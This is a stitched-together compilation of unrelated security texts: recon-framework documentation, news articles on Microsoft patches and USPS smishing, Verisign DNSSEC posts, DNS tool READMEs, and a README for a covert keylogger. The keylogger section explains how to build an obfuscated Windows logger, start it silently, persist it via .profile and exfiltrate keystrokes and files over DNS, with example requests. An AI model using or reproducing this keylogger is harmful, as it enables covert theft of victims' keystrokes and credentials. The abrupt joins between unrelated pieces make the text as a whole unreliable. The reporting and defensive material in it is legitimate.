At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.
All Core Modules for The Ars0n Framework are stored in the /toolkit
directory. Simply navigate to the directory and run wildfire.py
with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initalize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
If only Patch Tuesdays came around infrequently — like total solar eclipse rare — instead of just creeping up on us each month like The Man in the Moon. Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.
Yes, you read that right. Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.
“This is the largest release from Microsoft this year and the largest since at least 2017,” said Dustin Childs, from Trend Micro’s Zero Day Initiative (ZDI). “As far as I can tell, it’s the largest Patch Tuesday release from Microsoft of all time.”
Tempering the sheer volume of this month’s patches is the middling severity of many of the bugs. Only three of April’s vulnerabilities earned Microsoft’s most-dire “critical” rating, meaning they can be abused by malware or malcontents to take remote control over unpatched systems with no help from users.
Most of the flaws that Microsoft deems “more likely to be exploited” this month are marked as “important,” which usually involve bugs that require a bit more user interaction (social engineering) but which nevertheless can result in system security bypass, compromise, and the theft of critical assets.
Ben McCarthy, lead cyber security engineer at Immersive Labs called attention to CVE-2024-20670, an Outlook for Windows spoofing vulnerability described as being easy to exploit. It involves convincing a user to click on a malicious link in an email, which can then steal the user’s password hash and authenticate as the user in another Microsoft service.
Another interesting bug McCarthy pointed to is CVE-2024-29063, which involves hard-coded credentials in Azure’s search backend infrastructure that could be gleaned by taking advantage of Azure AI search.
“This along with many other AI attacks in recent news shows a potential new attack surface that we are just learning how to mitigate against,” McCarthy said. “Microsoft has updated their backend and notified any customers who have been affected by the credential leakage.”
CVE-2024-29988 is a weakness that allows attackers to bypass Windows SmartScreen, a technology Microsoft designed to provide additional protections for end users against phishing and malware attacks. Childs said one of ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.
“I would treat this as in the wild until Microsoft clarifies,” Childs said. “The bug itself acts much like CVE-2024-21412 – a [zero-day threat from February] that bypassed the Mark of the Web feature and allows malware to execute on a target system. Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass Mark of the Web.”
Update, 7:46 p.m. ET: A previous version of this story said there were no zero-day vulnerabilities fixed this month. BleepingComputer reports that Microsoft has since confirmed that there are actually two zero-days. One is the flaw Childs just mentioned (CVE-2024-21412), and the other is CVE-2024-26234, described as a “proxy driver spoofing” weakness.
Satnam Narang at Tenable notes that this month’s release includes fixes for two dozen flaws in Windows Secure Boot, the majority of which are considered “Exploitation Less Likely” according to Microsoft.
“However, the last time Microsoft patched a flaw in Windows Secure Boot in May 2023 had a notable impact as it was exploited in the wild and linked to the BlackLotus UEFI bootkit, which was sold on dark web forums for $5,000,” Narang said. “BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up. While none of these Secure Boot vulnerabilities addressed this month were exploited in the wild, they serve as a reminder that flaws in Secure Boot persist, and we could see more malicious activity related to Secure Boot in the future.”
For links to individual security advisories indexed by severity, check out ZDI’s blog and the Patch Tuesday post from the SANS Internet Storm Center. Please consider backing up your data or your drive before updating, and drop a note in the comments here if you experience any issues applying these fixes.
Adobe today released nine patches tackling at least two dozen vulnerabilities in a range of software products, including Adobe After Effects, Photoshop, Commerce, InDesign, Experience Manager, Media Encoder, Bridge, Illustrator, and Adobe Animate.
KrebsOnSecurity needs to correct the record on a point mentioned at the end of March’s “Fat Patch Tuesday” post, which looked at new AI capabilities built into Adobe Acrobat that are turned on by default. Adobe has since clarified that its apps won’t use AI to auto-scan your documents, as the original language in its FAQ suggested.
“In practice, no document scanning or analysis occurs unless a user actively engages with the AI features by agreeing to the terms, opening a document, and selecting the AI Assistant or generative summary buttons for that specific document,” Adobe said earlier this month.
This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.
These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments:
ip
domain
options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p
flag to specify a different port.
ip
is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain
is the domain to listen for, which should be the domain that the server is authoritative for.
On the registrar, you want to change your domain's namespace to custom DNS.
Point them to two domains, ns1.example.com
and ns2.example.com
.
Add records that make point the namespace domains to your exfiltration server's IP address.
This is the same as setting glue records.
The Linux keylogger is two bash scripts. connection.sh
is used by the logger.sh
script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh
script. It will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed
To start the keylogger, run the command ./logger.sh [domain] && exit
. This will silently start the keylogger, and any inputs typed will be sent. The && exit
at the end will cause the shell to close on exit
. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null
to display error messages.
The -p
option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/
.
The -l
option will show warnings and errors. Can be useful for debugging.
logger.sh
and connection.sh
must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile
to start on every new interactive shell.
connection.sh
Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet
To build keylogging program, run make
in the windows
directory. To build with reduced size and some amount of obfuscation, make the production
target. This will create the build
directory for you and output to a file named logger.exe
in the build
directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug
target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
You can use dig
to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short
send a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short
send a test message to localhost.
Replace example.com
with the domain the server is listening for.
A record requests starting with a
indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
A record requests starting with b
indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id
is the id that was established on connection. Data is sent as ASCII encoded in hex.
code
is one of the codes described below.
200
: OKIf the client sends a request that is processed normally, the server will respond with code 200
.
201
: Malformed Record RequestsIf the client sends an malformed record request, the server will respond with code 201
.
202
: Non-Existant ConnectionsIf the client sends a data packet with an id greater than the # of connections, the server will respond with code 202
.
203
: Out of Order PacketsIf the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203
. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.
204
Reached Max ConnectionIf the client attempts to create a connection when the max has reached, the server will respond with code 204
.
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat
, you should select the appropriate option to print ASCII control characters, such as -v
for cat
, or open it in a text-editor.
The keylogger relies on script
, so the keylogger won't run in non-interactive shells.
For some reason, the Windows Dns_Query_A
always sends duplicate requests. The server will process it fine because it discards repeated packets.
The quantum computing era is coming, and it will change everything about how the world connects online. While quantum computing will yield tremendous benefits, it will also create new risks, so it’s essential that we prepare our critical internet infrastructure for what’s to come. That’s why we’re so pleased to share our latest efforts in this area, including technology that we’re making available as an open source implementation to help internet operators worldwide prepare.
In recent years, the research team here at Verisign has been focused on a future where quantum computing is a reality, and where the general best practices and guidelines of traditional cryptography are re-imagined. As part of that work, we’ve made three further contributions to help the DNS community prepare for these changes:
First, a brief refresher on what MTL mode is and what it accomplishes:
MTL mode is a technique developed by Verisign researchers that can reduce the operational impact of a signature scheme when authenticating an evolving series of messages. Rather than signing messages individually, MTL mode signs structures called Merkle tree ladders that are derived from the messages to be authenticated. Individual messages are authenticated relative to a ladder using a Merkle tree authentication path, while ladders are authenticated relative to a public key of an underlying signature scheme using a digital signature. The size and computational cost of the underlying digital signatures can therefore be spread across multiple messages.
The reduction in operational impact achieved by MTL mode can be particularly beneficial when the mode is applied to a signature scheme that has a large signature size or computational cost in specific use cases, such as when post-quantum signature schemes are applied to DNSSEC.
Recently, Verisign Fellow Duane Wessels described how Verisign’s DNSSEC algorithm update — from RSA/SHA-256 (Algorithm 8) to ECDSA Curve P-256 with SHA-256 (Algorithm 13) — increases the security strength of DNSSEC signatures and reduces their size impact. The present update is a logical next step in the evolution of DNSSEC resiliency. In the future, it is possible that DNSSEC may utilize a post-quantum signature scheme. Among the new post-quantum signature schemes currently being standardized, though, there is a shortcoming; if we were to directly apply these schemes to DNSSEC, it would significantly increase the size of the signatures1. With our work on MTL mode, the researchers at Verisign have provided a way to achieve the security benefit of a post-quantum algorithm rollover in a way that mitigates the size impact.
Put simply, this means that in a quantum environment, the MTL mode of operation developed by Verisign will enable internet infrastructure operators to use the longer signatures they will need to protect communications from quantum attacks, while still supporting the speed and space efficiency we’ve come to expect.
For more background information on MTL mode and how it works, see my July 2023 blog post, the MTL mode I-D, or the research paper, “Merkle Tree Ladder Mode: Reducing the Size Impact of NIST PQC Signature Algorithms in Practice.”
In my July 2023 blog post titled “Next Steps in Preparing for Post-Quantum DNSSEC,” I described two recent contributions by Verisign to help the DNS community prepare for a post-quantum world: the MTL mode I-D and a public, royalty-free license to certain intellectual property related to that I-D. These activities set the stage for the latest contributions I’m announcing in this post today.
Verisign is grateful for the DNS community’s interest in this area, and we are pleased to serve as stewards of the internet when it comes to developing new technology that can help the internet grow and thrive. Our work on MTL mode is one of the longer-term efforts supporting our mission to enhance the security, stability, and resiliency of the global DNS. We’re encouraged by the progress that has been achieved, and we look forward to further collaborations as we prepare for a post-quantum future.
The post Verisign Provides Open Source Implementation of Merkle Tree Ladder Mode appeared first on Verisign Blog.
The fake USPS phishing page.
Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader’s address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.
The landing page generated by the phishing link includes the USPS logo, and says “Your package is on hold for an invalid recipient address. Fill in the correct address info by the link.” Below that message is a “Click update” button that takes the visitor to a page that asks for more information.
The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.
This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage’s code and operations.
Check out the bottom portion of the screenshot below, and you’ll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.
A search on this domain at the always-useful URLscan.io shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):
usps.receivepost[.]com
usps.informedtrck[.]com
usps.trckspost[.]com
postreceive[.]com
usps.trckpackages[.]com
usps.infortrck[.]com
usps.quicktpos[.]com
usps.postreceive].]com
usps.revepost[.]com
trackingusps.infortrck[.]com
usps.receivepost[.]com
usps.trckmybusi[.]com
postreceive[.]com
tackingpos[.]com
usps.trckstamp[.]com
usa-usps[.]shop
usps.infortrck[.]com
unlistedstampreceive[.]com
usps.stampreceive[.]com
usps.stamppos[.]com
usps.stampspos[.]com
usps.trckmypost[.]com
usps.trckintern[.]com
usps.tackingpos[.]com
usps.posinformed[.]com
As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code — UA-80133954-3 — which apparently was rejected for pointing to an invalid domain.
Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. Click to enlarge. That code actually belongs to the USPS.
The valid domain for that Google Analytics code is the official usps.com website. According to dnslytics.com, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which DomainTools.com says was registered way back in September 2018 to an individual in Nigeria.
A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which archive.org shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.
DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based Alibaba.com, but the registrant city and state listed for that domain says “Georgia, AL,” which is not a real location.
Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in “.top.” These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.
Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).
A phishing page targeting An Post, the state-owned provider of postal services in Ireland.
The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.
An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox any.run. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.
The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun’s other Telegram channels, it appears this account is being massively spammed at the moment — possibly thanks to public attention brought by this story.
Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.
Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.
With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.
If you’re unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark so as to avoid potential typosquatting sites.
Update: Added information about the Telegram bot and any.run analysis.
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
-i
, --interface
: Specify the network interface (e.g., eth0).-v
, --verbose
: Use this flag for more verbose output.-o
, --output
: Specify the filename to save results.-t
, --target-ip
: Specify a specific target IP address to monitor.-adt
, --analyze-dns-types
: Analyze DNS types.--doh
: Use DNS over HTTPS (DoH) for resolving DNS requests.-fd
, --target-domains
: Filter DNS requests by specified domains.-d
, --database
: Enable database storage for DNS requests.Press Ctrl+C
to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
Raw html extractor from Hurricane Electric portal
go install -v github.com/HuntDownProject/hednsextractor/cmd/hednsextractor@latest
usage -h
Getting the IP Addresses used for hackerone.com, and enumerating only the networks.
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-networks
[INF] [104.16.99.52] 104.16.0.0/12
[INF] [104.16.99.52] 104.16.96.0/20
Getting the IP Addresses used for hackerone.com, and enumerating only the domains (using tail to show the first 10 results).
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-domains | tail -n 10
herllus.com
hezzy.store
hilariostore.com
hiperdrop.com
hippratas.online
hitsstory.com
hobbyshop.site
holyangelstore.com
holzfallerstore.fun
homedescontoo.com
Edit the config file and add the Virustotal API Key
cat $HOME/.config/hednsextractor/config.yaml
# hednsextractor config file
# generated by https://github.com/projectdiscovery/goflags
# show only domains
#only-domains: false
# show only networks
#only-networks: false
# show virustotal score
#vt: false
# minimum virustotal score to show
#vt-score: 0
# ip address or network to query
#target:
# show silent output
#silent: false
# show verbose output
#verbose: false
# virustotal api key
vt-api-key: Your API Key goes here
So, run the hednsextractor
with -vt
parameter.
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -only-domains -vt
And the output will be as below
_______ ______ _ _______ _______ _________ _______ _______ _______ _________ _______ _______
|\ /|( ____ \( __ \ ( ( /|( ____ \( ____ \|\ /|\__ __/( ____ )( ___ )( ____ \\__ __/( ___ )( ____ )
| ) ( || ( \/| ( \ )| \ ( || ( \/| ( \/( \ / ) ) ( | ( )|| ( ) || ( \/ ) ( | ( ) || ( )|
| (___) || (__ | | ) || \ | || (_____ | (__ \ (_) / | | | (____)|| (___) || | | | | | | || (____)|
| ___ || __) | | | || (\ \) |(_____ )| __) ) _ ( | | | __)| ___ || | | | | | | || __)
| ( ) || ( | | ) || | \ | ) || ( / ( ) \ | | | (\ ( | ( ) || | | | | | | || (\ (
| ) ( || (____/\| (__/ )| ) \ |/\____) || (____/\( / \ ) | | | ) \ \__| ) ( || (____/\ | | | (___) || ) \ \__
|/ \|(_______/(______/ |/ )_)\_______)(_______/|/ \| )_( |/ \__/|/ \|(_______/ )_( (_______)|/ \__/
[INF] Current hednsextractor version v1.0.0
[INF] [104.16.0.0/12] domain: ohst.ltd VT Score: 0
[INF] [104.16.0.0/12] domain: jxcraft.net VT Score: 0
[INF] [104.16.0.0/12] domain: teatimegm.com VT Score: 2
[INF] [104.16.0.0/12] domain: debugcheat.com VT Score: 0
As part of Verisign’s ongoing effort to make global internet infrastructure more secure, stable, and resilient, we will soon make an important technology update to how we protect the top-level domains (TLDs) we operate. The vast majority of internet users won’t notice any difference, but the update will support enhanced security for several Verisign-operated TLDs and pave the way for broader adoption and the next era of Domain Name System (DNS) security measures.
Beginning in the next few months and continuing through the end of 2023, we will upgrade the algorithm we use to sign domain names in the .com, .net, and .edu zones with Domain Name System Security Extensions (DNSSEC).
In this blog, we’ll outline the details of the upcoming change and what members of the DNS technical community need to know.
DNSSEC provides data authentication security to DNS responses. It does this by ensuring any altered data can be detected and blocked, thereby preserving the integrity of DNS data. Think of it as a chain of trust – one that helps avoid misdirection and allows users to trust that they have gotten to their intended online destination safely and securely.
Verisign has long been at the forefront of DNSSEC adoption. In 2010, a major milestone occurred when the Internet Corporation for Assigned Names and Numbers (ICANN) and Verisign signed the DNS root zone with DNSSEC. Shortly after, Verisign introduced DNSSEC to its TLDs, beginning with .edu in mid-2010, .net in late 2010, and .com in early 2011. Additional TLDs operated by Verisign were subsequently signed as well.
In the time since we signed our TLDs, we have worked continuously to help members of the internet ecosystem take advantage of DNSSEC. We do this through a wide range of activities, including publishing technical resources, leading educational sessions, and advocating for DNSSEC adoption in industry and technical forums.
Since the TLDs were first signed, we have observed two very distinct phases of growth in the number of signed second-level domains (SLDs).
The first growth phase occurred from 2012 to 2020. During that time, signed domains in the .com zone grew at about 0.1% of the base per year on average, reaching just over 1% by the end of 2020. In the .net zone, signed domains grew at about 0.1% of the base per year on average, reaching 1.2% by the end of 2020. These numbers demonstrated a slow but steady increase, which can be seen in Figure 1.
Figure 1: A chart spanning 2010 through the present shows the number of .com and .net domain names with DS – or Delegation Signer – records. These records form a link in the DNSSEC chain-of-trust for signed domains, indicating an uptick in DNSSEC adoption among SLDs.
We’ve observed more pronounced growth in signed SLDs during the second growth phase, which began in 2020. This is largely due to a single registrar that enabled DNSSEC by default for their new registrations. For .com, the annual rate increased to 0.9% of the base, and for .net, it increased to 1.1% of the base. Currently, 4.2% of .com domains are signed and 5.1% of .net domains are signed. This accelerated growth is also visible in Figure 1.
As we look forward, Verisign anticipates continued growth in the number of domains signed with DNSSEC. To support continued adoption and help further secure the DNS, we’re planning to make one very important change.
All Verisign TLDs are currently signed with DNSSEC algorithm 8, also known as RSA/SHA-256, as documented in our DNSSEC Practice Statements. Currently, we use a 2048-bit Key Signing Key (KSK), and 1280-bit Zone Signing Keys (ZSK). The RSA algorithm has served us (and the broader internet) well for many years, but we wanted to take the opportunity to implement more robust security measures while also making more efficient use of resources that support DNSSEC-signed domain names.
We are planning to transition to the Elliptic Curve Digital Signature Algorithm (ECDSA), specifically Curve P-256 with SHA-256, or algorithm number 13, which allows for smaller signatures and improved cryptographic strength. This smaller signature size has a secondary benefit, as well: any potential DDoS attacks will have less amplification as a result of the smaller signatures. This could help protect victims from bad actors and cybercriminals.
Support for DNSSEC signing and validation with ECDSA has been well-established by various managed DNS providers, 78 other TLDs, and nearly 10 million signed SLDs. Additionally, research performed by APNIC and NLnet Labs shows that ECDSA support in validating resolvers has increased significantly in recent years.
How did we get to this point? It took a lot of careful preparation and planning, but with internet stewardship at the forefront of our mission, we wanted to protect the DNS with the best technologies available to us. This means taking precise measures in everything we do, and this transition is no exception.
Algorithm 13 was on our radar for several years before we officially kicked off the implementation process this year. As mentioned previously, the primary motivating properties were the smaller signature size, with each signature being 96 bytes smaller than our current RSA signatures (160 bytes vs. 64 bytes), and the improved cryptographic strength. This helps us plan for the future and prepare for a world where more domain names are signed with DNSSEC.
Each TLD will first implement the rollover to algorithm 13 in Verisign’s Operational Test & Evaluation (OT&E) environment prior to implementing the process in production, for a total of two rollovers per TLD. Combined, this will result in six total rollovers across the .com, .net, and .edu TLDs. Rollovers between the individual TLDs will be spaced out to avoid overlap where possible.
The algorithm rollover for each TLD will follow this sequence of events:
Only when a successful rollover has been done in OT&E will we begin the process in production.
Now that we’ve given the background, we know you’re wondering: how might this affect me?
The change to a new DNSSEC-signing algorithm is expected to have no impact for the vast majority of internet users, service providers, and domain registrants. According to the aforementioned research by APNIC and NLnet Labs, most DNSSEC validators support ECDSA, and any that do not will simply ignore the signatures and still be able to resolve domains in Verisign-operated TLDs.
Regarding timing, we plan to begin to transition to ECDSA in the third and fourth quarters of this year. We will start the transition process with .edu, then .net, and then .com. We are currently aiming to have these three TLDs transitioned before the end of the fourth quarter 2023, but we will let the community know if our timeline shifts.
As leaders in DNSSEC adoption, this algorithm rollover demonstrates yet another critical step we are taking toward making the internet more secure, stable, and resilient. We look forward to enabling the change later this year, providing more efficient and stronger cryptographic security while optimizing resource utilization for DNSSEC-signed domain names.
The post Verisign Will Help Strengthen Security with DNSSEC Algorithm Update appeared first on Verisign Blog.
In 2021, we discussed a potential future shift from established public-key algorithms to so-called “post-quantum” algorithms, which may help protect sensitive information after the advent of quantum computers. We also shared some of our initial research on how to apply these algorithms to the Domain Name System Security Extensions, or DNSSEC. In the time since that blog post, we’ve continued to explore ways to address the potential operational impact of post-quantum algorithms on DNSSEC, while also closely tracking industry research and advances in this area.
Now, significant activities are underway that are setting the timeline for the availability and adoption of post-quantum algorithms. Since DNS participants – including registries and registrars – use public key-cryptography in a number of their systems, these systems may all eventually need to be updated to use the new post-quantum algorithms. We also announce two major contributions that Verisign has made in support of standardizing this technology: an Internet-Draft as well as a public, royalty-free license to certain intellectual property related to that Internet-Draft.
In this blog post, we review the changes that are on the horizon and what they mean for the DNS ecosystem, and one way we are proposing to ease the implementation of post-quantum signatures – Merkle Tree Ladder mode.
By taking these actions, we aim to be better prepared (while also helping others prepare) for a future where cryptanalytically relevant quantum computing and post-quantum cryptography become a reality.
In July 2022, the National Institute of Standards and Technology (NIST) selected one post-quantum encryption algorithm and three post-quantum signature algorithms for standardization, with standards for these algorithms arriving as early as 2024. In line with this work, the Internet Engineering Task Force (IETF) has also started standards development activities on applying post-quantum algorithms to internet protocols in various working groups, including the newly formed Post-Quantum Use in Protocols (PQUIP) working group. And finally, the National Security Agency (NSA) recently announced that National Security Systems are expected to transition to post-quantum algorithms by 2035.
Collectively, these announcements and activities indicate that many organizations are envisioning a (post-)quantum future, across many protocols. Verisign’s main concern continues to be how post-quantum cryptography impacts the DNS, and in particular, how post-quantum signature algorithms impact DNSSEC.
The standards being developed in the next few years are likely to be the ones deployed when the post-quantum transition eventually takes place, so now is the time to take operational requirements for specific protocols into account.
For DNSSEC, the operational concerns are twofold.
First, the large signature sizes of current post-quantum signatures selected by NIST would result in DNSSEC responses that exceed the size limits of the User Datagram Protocol, which is broadly deployed in the DNS ecosystem. While the Transmission Control Protocol and other transports are available, the additional overhead of having large post-quantum signatures on every response — which can be one to two orders of magnitude as long as traditional signatures —introduces operational risk to the DNS ecosystem that would be preferable to avoid.
Second, the large signatures would significantly increase memory requirements for resolvers using in-memory caches and authoritative nameservers using in-memory databases.
Figure 1, from Andy Fregly’s recent presentation at OARC 40, shows the impact on a fully signed DNS zone where, on average, there are 2.2 digital signatures per resource record set (covering both existence and non-existence proofs). The horizontal bars show the percentage of the zone file that would be comprised of signature data for the two prevalent current algorithms, RSA and ECDSA, and for the smallest and largest of the NIST PQC algorithms. At the low and high end of these examples, signatures with ECDSA would take up 40% of the zone and SPHINCS+ signatures would take up over 99% of the zone. The vertical bars give the percentage size increase of the zone file due to signatures. Again, comparing the low and high end, a zone fully signed with SPHINCS+ would be about 50 times the size of a zone fully signed with ECDSA.
In his 1988 article, “The First Ten Years of Public-Key Cryptography,” Whitfield Diffie, co-discoverer of public-key cryptography, commented on the lack of progress in finding public-key encryption algorithms that were as fast as the symmetric-key algorithms of the day: “Theorems or not, it seemed silly to expect that adding a major new criterion to the requirements of a cryptographic system could fail to slow it down.”
Diffie’s counsel also appears relevant to the search for post-quantum algorithms: It would similarly be surprising if adding the “major new criterion” of post-quantum security to the requirements of a digital signature algorithm didn’t impact performance in some way. Signature size may well be the tradeoff for post-quantum security, at least for now.
